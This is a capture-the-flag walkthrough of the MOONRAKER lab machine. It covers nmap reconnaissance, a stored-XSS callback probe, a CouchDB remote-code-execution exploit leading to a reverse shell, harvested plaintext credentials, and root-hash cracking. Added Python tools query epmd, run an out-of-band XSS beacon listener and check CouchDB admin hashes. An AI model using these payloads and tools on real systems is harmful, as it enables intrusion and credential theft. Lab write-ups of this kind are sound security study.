1. Information gathering
1.1 Scanning for open TCP ports
└─$ cat tcp_open_port.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:05:00 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00089s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3000/tcp  open  ppp
4369/tcp  open  epmd
5984/tcp  open  couchdb
34015/tcp open  unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)
# Nmap done at Sun Jul 16 15:05:53 2023 -- 1 IP address (1 host up) scanned in 53.10 seconds
1.2 Scanning for open UDP ports
└─$ cat udp_open_port.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:05:53 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.62.229
Warning: 192.168.62.229 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.229
Host is up (0.00081s latency).
All 65535 scanned ports on 192.168.62.229 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:DD:45:98 (VMware)
# Nmap done at Sun Jul 16 15:07:08 2023 -- 1 IP address (1 host up) scanned in 74.60 seconds
1.3 Service and version detection on the open ports, plus nmap's default scripts
└─$ cat open_port_service.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:07:08 2023 as: nmap -sT -sV -O -sC -p22,80,3000,4369,5984,34015, -oA open_port_service 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00095s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
|   2048 5fbfc033514f4aa74a7e1580aad72a0b (RSA)
|   256 5359871ea446bda7fd9a5ff9b7409d2f (ECDSA)
|_  256 0d88d9faaf08ce2b1366a770ec490210 (ED25519)
80/tcp    open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: MOONRAKER
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp  open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=401
4369/tcp  open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    couchdb: 34015
5984/tcp  open  http    CouchDB httpd 2.2.0 (Erlang OTP/19)
|_http-title: Site doesn't have a title (application/json).
|_http-server-header: CouchDB/2.2.0 (Erlang OTP/19)
34015/tcp open  unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 16 15:09:38 2023 -- 1 IP address (1 host up) scanned in 150.21 seconds
1.4 nmap vuln script scan
└─$ cat vuln_scan.nmap
# Nmap 7.93 scan initiated Sun Jul 16 15:09:38 2023 as: nmap --script=vuln -p22,80,3000,4369,5984,34015, -oA vuln_scan 192.168.62.229
Nmap scan report for 192.168.62.229
Host is up (0.00065s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
| http-enum:
|   /robots.txt: Robots file
|   /accounting/: Potentially interesting folder
|_  /services/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3000/tcp  open  ppp
4369/tcp  open  epmd
5984/tcp  open  couchdb
34015/tcp open  unknown
MAC Address: 00:0C:29:DD:45:98 (VMware)
# Nmap done at Sun Jul 16 15:10:31 2023 -- 1 IP address (1 host up) scanned in 52.66 seconds
2. Getting a shell
Six ports are open: 22, 80, 3000, 4369, 5984 and 34015. 22 and 80 are the familiar ones; I knew less about 3000, 4369, 5984 and 34015, so the plan was to first try a quick nc session against those to see whether anything talks back, then look at port 80, and finally port 22. (The service scan above already labels most of them: 3000 is a Node.js Express app behind HTTP Basic auth, 4369 is epmd, 5984 is CouchDB 2.2.0, and the epmd-info script maps the node name couchdb to port 34015, so the "unknown" port is the distribution listener of the CouchDB Erlang node.)
2.1 Ports 3000, 4369, 5984, 34015
Probing each with nc got no interactive response from any of them, so I moved on to port 80.
2.2 Port 80 website information gathering
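epmd is worth more than a blind nc poke: it is a tiny text-over-TCP registry, and asking it for its node table is how nmap's epmd-info script produced the couchdb: 34015 line above. The following is an added example (not part of the original write-up) that speaks that exchange: the client sends a 2-byte big-endian length followed by the NAMES_REQ opcode 0x6e ('n'), and epmd replies with its own port as 4 bytes followed by one "name <node> at port <port>" line per node, then closes the socket. The sample reply is constructed to match the write-up's scan result; the host address in the usage line is a placeholder.

```python
"""Query the Erlang Port Mapper Daemon (epmd) for registered nodes.

Added example, not from the original write-up. Protocol: NAMES_REQ is
<len:u16be><0x6e>; NAMES_RESP is <epmd_port:u32be> followed by text lines
"name <node> at port <port>\n". The sample response below is constructed
to mirror the nmap epmd-info output (node 'couchdb' on port 34015).
"""
import re
import socket
import struct

EPMD_PORT = 4369
NAMES_REQ = 0x6E  # ASCII 'n'

_NODE_LINE = re.compile(rb"name (\S+) at port (\d+)")


def build_names_req() -> bytes:
    """Frame a NAMES_REQ: <len:u16be><opcode:u8>."""
    body = bytes([NAMES_REQ])
    return struct.pack(">H", len(body)) + body


def parse_names_resp(data: bytes) -> tuple[int, dict[str, int]]:
    """Split a NAMES_RESP into (epmd_port, {node_name: distribution_port})."""
    if len(data) < 4:
        raise ValueError("short epmd response")
    epmd_port = struct.unpack(">I", data[:4])[0]
    nodes = {}
    for m in _NODE_LINE.finditer(data[4:]):
        nodes[m.group(1).decode()] = int(m.group(2))
    return epmd_port, nodes


def epmd_names(host: str, port: int = EPMD_PORT, timeout: float = 3.0) -> dict[str, int]:
    """Ask a live epmd for its node table; epmd closes the socket after replying."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_names_req())
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_names_resp(b"".join(chunks))[1]


# Constructed reply: what the target's epmd would send back, matching the
# nmap epmd-info result in the write-up.
SAMPLE_RESP = struct.pack(">I", EPMD_PORT) + b"name couchdb at port 34015\n"


def demo() -> dict[str, int]:
    """Offline walk-through of the exchange using the constructed reply."""
    assert build_names_req() == b"\x00\x01n"
    _, nodes = parse_names_resp(SAMPLE_RESP)
    return nodes


if __name__ == "__main__":
    print(demo())                     # {'couchdb': 34015}
    # Live use (placeholder address): print(epmd_names("192.168.62.229"))
```

The port epmd hands back (34015 here) is the node's Erlang distribution listener, which is why the TCP scan could not name it. Talking to it is gated by the node's Erlang cookie, so unless that cookie is recovered later it is just an inventory item, not an entry point.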
① Opening the site plays a short video and then shows three options. Since the service scan had found a robots.txt, I checked /robots.txt first, but it only contains Disallow: / and nothing of value.
② Next, directory brute-forcing:
└─$ cat web_scan.txt
/services (Status: 301) [Size: 319] [--> http://192.168.62.229/services/]
/cats (Status: 301) [Size: 315] [--> http://192.168.62.229/cats/]
/accounting (Status: 301) [Size: 321] [--> http://192.168.62.229/accounting/]
/server-status (Status: 403) [Size: 302]
/x-files (Status: 301) [Size: 318] [--> http://192.168.62.229/x-files/]
/wp-admin.php
③ Going through the three options in turn, they all lead to static .html pages. The source of http://192.168.62.229/services/ contains a link to /svc-inq/sales.html; that page says business inquiries are handled quickly.
④ Try XSS:
<img src="http://192.168.62.156:9999/web.jpg">test</a>
with an HTTP server started on Kali.
There really is a stored XSS: the callback arrives. But XSS has to be chained with something else to get a shell and is awkward to build, so first check for other attack vectors.
⑤ Went through port 80 once more using the brute-forced directories; found nothing obviously exploitable, so looked at the other ports.
⑥ Port 3000 in a browser pops an authentication prompt. Quick tries of SQL injection and XSS found nothing. With no credentials, note it down: if no other vector turns up, it can be brute-forced later with whatever credentials are collected.
⑦ Port 4369 cannot be opened in a browser.
⑧ Port 5984 shows version information; together with nmap's service detection, run searchsploit couchdb directly. It lists an RCE exploit; download it and use it (read the script first so you know what it will do to the target).
Following its prompts, enter the target IP and a command: exploitation succeeds!
⑨ Start a listener on Kali, then send a reverse-shell command. Shell obtained.
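The stored-XSS check in ④ is a blind test: nothing on the page tells you it fired, the proof is the request for web.jpg hitting your server. A plain python -m http.server shows that hit, but it does not tell you which page rendered the payload or what rendered it. Below is an added example (not part of the original write-up) of a small out-of-band listener that records client address, Referer and User-Agent for each beacon request and returns a 1x1 GIF so the injected image does not look broken. demo() binds a loopback port and replays a constructed request the way a browser loading the stored payload would send it, so it runs offline; the Referer value is constructed and the listener URL is a placeholder.

```python
"""Out-of-band listener to confirm a stored XSS payload fires.

Added example, not from the original write-up. A request for BEACON_PATH
arriving here proves the injected <img> tag was stored and rendered
unescaped. demo() is an offline stand-in for the victim browser.
"""
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Path the payload requests; any hit on it counts as a confirmed render.
BEACON_PATH = "/web.jpg"
# 1x1 transparent GIF so the <img> does not show a broken-image icon.
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
         b"\x00\x02\x02D\x01\x00;")


def build_payload(listener_url: str) -> str:
    """The stored-XSS probe: an image tag pointing at the listener."""
    return f'<img src="{listener_url.rstrip("/")}{BEACON_PATH}">'


class OobListener(HTTPServer):
    """HTTP server that records every request in self.hits."""

    def __init__(self, addr):
        super().__init__(addr, _Handler)
        self.hits: list[dict] = []


class _Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.server.hits.append({
            "client": self.client_address[0],
            "path": self.path,
            "referer": self.headers.get("Referer"),      # page that rendered it
            "user_agent": self.headers.get("User-Agent"),  # browser or bot
        })
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, *args):  # keep stdout quiet; hits are kept in memory
        pass


def start_listener(port: int = 0) -> OobListener:
    """Bind (port 0 = ephemeral) and serve in a background thread."""
    srv = OobListener(("127.0.0.1", port))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo() -> dict:
    """Stand-in for a victim browser loading the page that stores the payload."""
    srv = start_listener()
    url = f"http://127.0.0.1:{srv.server_port}"       # placeholder listener URL
    payload = build_payload(url)                       # what gets submitted to the form
    # Constructed request, as a browser rendering the stored payload would send it.
    req = urllib.request.Request(
        f"{url}{BEACON_PATH}",
        headers={"Referer": "http://192.168.62.229/svc-inq/sales.html",
                 "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"})
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # no proxy
    with opener.open(req, timeout=5) as resp:
        assert resp.headers["Content-Type"] == "image/gif"
    srv.shutdown()
    srv.server_close()
    hit = srv.hits[0]
    hit["payload"] = payload
    return hit


if __name__ == "__main__":
    print(demo())
```

For a real engagement run start_listener(9999) bound to the attacking interface instead of loopback and submit build_payload("http://<attacker>:9999") in the form; a hit whose Referer points at a back-office page and whose User-Agent is not yours is the useful signal, because it tells you who is reading the stored submissions.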
3. Privilege escalation
① I expected a database config file, since there was a login page, but found nothing under /var/www/.
② Since the foothold came through CouchDB, look for its directories and config files. /opt/couchdb/etc/local.ini holds two credentials:
admin/mysecretpassword
hugo/321Blast0ff!!
③ Logged in as hugo successfully.
④ On login there is a notice that this user has mail. First check sudo -l and the shell history for escalation leads; nothing useful. So go straight to /var/mail/.
⑤ cat hugo reveals a root hash in the old shadow format, together with a note that the new password is the old one plus VR00M.
⑥ Copy the hash into a file on Kali and run john against it; it soon returns the old password cyber, so the new one is cyberVR00M. su to root succeeds!!!
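The local.ini find in ② deserves a closer look than grepping for "password". CouchDB rewrites plaintext [admins] entries on startup into the form -pbkdf2-<sha1-hex>,<salt>,<iterations> (PBKDF2-HMAC-SHA1, 20-byte key, with the salt used as its ASCII text), so a file you pull off a box may hold either plaintext, as it did here, or hashed values that still need a candidate list. The following is an added example (not from the original write-up) that parses the section, flags which entries are still plaintext, and checks candidates against the hashed ones. The ini fragment, usernames and passwords are constructed; they are not the target's.

```python
"""Triage CouchDB's local.ini [admins] section.

Added example, not from the original write-up. Handles both plaintext
entries and CouchDB's "-pbkdf2-<sha1-hex>,<salt>,<iterations>" form.
All sample data below is constructed.
"""
import configparser
import hashlib
import hmac
import secrets
from typing import Optional

PBKDF2_PREFIX = "-pbkdf2-"


def hash_admin_password(password: str, salt: Optional[str] = None, iterations: int = 10) -> str:
    """Produce a CouchDB-style [admins] value.

    Default iterations follow CouchDB 2.x's [couch_httpd_auth] iterations = 10;
    CouchDB uses a random 32-hex-character salt.
    """
    salt = salt or secrets.token_hex(16)
    dk = hashlib.pbkdf2_hmac("sha1", password.encode(), salt.encode(), iterations, 20)
    return f"{PBKDF2_PREFIX}{dk.hex()},{salt},{iterations}"


def verify_admin(stored: str, candidate: str) -> bool:
    """Check a candidate against a hashed [admins] value (or a plaintext one)."""
    if not stored.startswith(PBKDF2_PREFIX):
        return hmac.compare_digest(stored.encode(), candidate.encode())
    digest_hex, salt, iters = stored[len(PBKDF2_PREFIX):].split(",")
    dk = hashlib.pbkdf2_hmac("sha1", candidate.encode(), salt.encode(), int(iters), 20)
    return hmac.compare_digest(dk.hex(), digest_hex)


def parse_admins(ini_text: str) -> dict[str, dict]:
    """Return {user: {"value": ..., "plaintext": bool}} from local.ini text."""
    cp = configparser.ConfigParser(interpolation=None)  # passwords may contain '%'
    cp.optionxform = str                                # keep usernames case-sensitive
    cp.read_string(ini_text)
    out = {}
    if cp.has_section("admins"):
        for user, value in cp.items("admins"):
            out[user] = {"value": value, "plaintext": not value.startswith(PBKDF2_PREFIX)}
    return out


# Constructed local.ini fragment: one entry already hashed by CouchDB, one
# still in plaintext (the situation the write-up found).
_ADMIN_HASH = hash_admin_password("s3cret-admin", salt="deadbeefdeadbeefdeadbeefdeadbeef")
SAMPLE_INI = (
    "[couchdb]\n"
    "uuid = 0f3a1c2e7b9d4a5f8e6b1c0d2a3e4f5b\n"
    "\n"
    "[admins]\n"
    f"admin = {_ADMIN_HASH}\n"
    "ops = plaintext-example-pass\n"
)


def demo() -> dict:
    """Triage SAMPLE_INI and test a small constructed candidate list per entry."""
    candidates = ["password", "s3cret-admin", "plaintext-example-pass"]
    result = {}
    for user, info in parse_admins(SAMPLE_INI).items():
        hit = next((c for c in candidates if verify_admin(info["value"], c)), None)
        result[user] = {"plaintext": info["plaintext"], "cracked": hit}
    return result


if __name__ == "__main__":
    for user, r in demo().items():
        print(user, r)
```

Whatever comes out, plaintext or cracked, is a reuse candidate: the write-up took hugo's value straight to a login, and the Basic realm on port 3000 noted in 2.2 ⑥ is the other obvious place to try the same pairs before spending time on a brute force.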
Personal notes
With this many ports it is hard to know what to drop; learning to set priorities and to cap the time spent on each attack vector matters.